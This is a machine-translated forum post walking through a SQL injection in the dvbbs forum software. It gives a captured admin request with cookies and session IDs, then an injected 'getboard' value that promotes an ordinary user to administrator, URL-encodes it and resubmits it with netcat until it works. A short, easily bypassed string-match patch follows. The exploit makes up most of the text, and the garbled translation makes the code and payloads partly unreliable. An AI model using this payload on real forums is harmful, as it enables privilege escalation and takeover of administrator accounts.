Let the Internet go to hell again (dvbbs's latest vulnerability on July 22, June 17) with simple Patches

Source: Freezing Point Forum

First, look for a layout without fixed posts. One
Forum
It is impossible for any forum to have a fixed roof, right? Click in to see if there are fixed posts or something.

Platform. Of course, it is necessary to "meet" the vulnerability conditions. Log on as an administrator.

You don't have to use the front-end Postmaster to go in. You just need to fix the post and send one at will.

Post. Then, click set solid top.

Stick to the top in normal mode,

In this case, we pause and open the WSE packet capture tool to capture submitted post information. Click

Confirm the operation. Now let's see what WSE caught,

The post submission information is intercepted and copied. The content is as follows:
Post/SQL/admin_postings.asp? Action = Istop HTTP/1.1
Accept: image/GIF, image/X-xbitmap, image/JPEG, image/pjpeg,

Application/X-Shockwave-flash ,*/*
Referer:
Http: // 192.168.1.254/SQL/admin_postings.asp? Action = Istop
Accept-language: ZH-CN
Content-Type: Application/X-WWW-form-urlencoded
Accept-encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2;

Tencenttraveler;. Net CLR 1.1.4322)
HOST: 192.168.1.254
Content-Length: 133
Connection: keep-alive
Cache-control: No-Cache
COOKIE:

192% 2e168% 2e1% 2e254% 2 fsql % 2f = userid = 1 & usercookies = 0 & Password = 9pb621664s

5w7il7 & userhidden = 2 & userclass = % B9 % DC % C0 % ed % D4 % B1 & username = Admin & statuse

Rid = 1929167667; aspsessionidcatqtatt = jjghmomdljjaafhagmlgomil;

Aspsessionidacttrats = nmlhlbbapmoiegaibmbfoimh; dvbbs =; upnum = 0
Istopaction = 1 & boardid = 1 & id = 1 & Title = & content = A & dowealth = 0 & dousercp = 0 & Dou

Serep = 0 & MSG = & ismsg = & getboard = 1 & submit = % C8 % B7 % C8 % CF % B2 % D9 % D7 % F7
What do we do now? Change getboard to 1, 1); update [dv_user] Set usergroupid = 1

Where userid = 2; -- convert we need to first switch to unicode=, use encoder.exe to convert

The result is as follows: % 31% 2C % 31% 3B % 29% 75% 70% 64% 61% 5B % 74% 5f % 65% 20% 64% 76% 75%

5D % 20% 73% 65% 74% 20% 75% 73% 65% 72% 67% 72% 6f % 75% 70% 69% 3D % 64% 31% 20% 77% 68% 72

% 65% 20% 75% 73% 65% 72% 69% 3D % 64% 3B % 2D % 20
Replace the getboard = 1 with the injection statement. This statement indicates that the userid value is

2 users mentioned the Administrator group, but only the front-end administrator. Then, calculate the number of characters added to the string.

Change the value of Content-Length to 250. Use NC to submit the modification,

.

The idea is to submit the content of a.txt to nc. after that, the returned information will be stored in 1.htm.
Take a look at the 1.htm of our output,

Syntax error? Do you know why? As I have said before, I have no count for the length of Content-Length.

Statement: 1, 1); update [dv_user] Set usergroupid = 1 where user here, the statement

The execution is not complete. Is it correct? But it doesn't matter. Let's change the length to 278 and try again.

The output result of 1.htm is later displayed,

No? Operation successful. The injection statement is successfully executed. Let's see if the user with userid = 2 is

No, the user name corresponding to userid = 2 is: 619054. In order to save trouble, I directly go to the background

Check whether the permission of this user is administrator,

Haha, It's really upgraded to administrator. This vulnerability can not only escalate users from common permissions to management

The administrator can also directly change the password of the background administrator. Is that serious? Internet official
Forum
No Patches have been released till now. Really depressing

Bytes -----------------------------------------------------------------------------------------------------------

The following patch for yezhan temporary shielding of this vulnerability has been written on my site (http://532100.com)

Because no patch has been released officially

The severity of the problem does not need to be discussed.

First, I will write a simple blocking patch.

Add a piece of code when processing the submitted getboard.

Code:
If instr ("" & request. form ("getboard ")&"", "% 75% 70% 64% 61% 74% 65% 5B % 20% 64% 5f % 76% 75% 73% 65% 5d % 72% 20% 73% 65% 74% 20% 75% 73% 65% 72% 6f % 67% 72% 75% 70% 3D" )> 0 then <br/> response. write "do not use the latest vulnerability to inject attacks into this site. "<br/> response. end </P> <p> else </P> <p> original Code </P> <p>
[Ctrl + A select all]

Add at the end of the file
"End if"

The above is my idea.

You can also use

Replace the modified admin_postings.asp file to block this vulnerability.